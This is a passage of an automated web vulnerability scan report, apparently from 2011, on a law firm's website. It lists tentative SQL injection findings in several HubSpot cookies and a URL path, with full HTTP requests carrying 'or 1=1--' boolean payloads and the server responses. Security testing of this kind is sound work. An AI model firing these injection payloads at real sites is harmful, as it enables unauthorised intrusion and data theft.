<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...

1.22. http://www.pillsburylaw.com/ [hubspotutk cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hubspotutk cookie appears to be vulnerable to SQL injection attacks. The payloads 78616436'%20or%201%3d1--%20 and 78616436'%20or%201%3d2--%20 were each submitted in the hubspotutk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee578616436'%20or%201%3d1--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:09:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTUTK=;expires=Wed, 12-May-2010 16:09:55 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee578616436'%20or%201%3d2--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819626;path=/
Set-Cookie: CFTOKEN=40904157;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:09:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...

1.23. http://www.pillsburylaw.com/ [hubspotvd cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hubspotvd cookie appears to be vulnerable to SQL injection attacks. The payloads 57053856'%20or%201%3d1--%20 and 57053856'%20or%201%3d2--%20 were each submitted in the hubspotvd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee557053856'%20or%201%3d1--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVD=;expires=Wed, 12-May-2010 16:10:04 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee557053856'%20or%201%3d2--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819645;path=/
Set-Cookie: CFTOKEN=46650698;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:10:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...

1.24. http://www.pillsburylaw.com/ [hubspotvm cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hubspotvm cookie appears to be vulnerable to SQL injection attacks. The payloads 17776757'%20or%201%3d1--%20 and 17776757'%20or%201%3d2--%20 were each submitted in the hubspotvm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee517776757'%20or%201%3d1--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVM=;expires=Wed, 12-May-2010 16:10:22 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee517776757'%20or%201%3d2--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819684;path=/
Set-Cookie: CFTOKEN=93449910;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:10:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...

1.25. http://www.pillsburylaw.com/ [hubspotvw cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hubspotvw cookie appears to be vulnerable to SQL injection attacks. The payloads 16942143'%20or%201%3d1--%20 and 16942143'%20or%201%3d2--%20 were each submitted in the hubspotvw cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee516942143'%20or%201%3d1--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVW=;expires=Wed, 12-May-2010 16:10:13 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee516942143'%20or%201%3d2--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819666;path=/
Set-Cookie: CFTOKEN=29553522;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:10:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...

1.26. http://www.pillsburylaw.com/404.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /404.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 57742005'%20or%201%3d1--%20 and 57742005'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /404.htm57742005'%20or%201%3d1--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:11:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /404.htm57742005'%20or%201%3d2--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
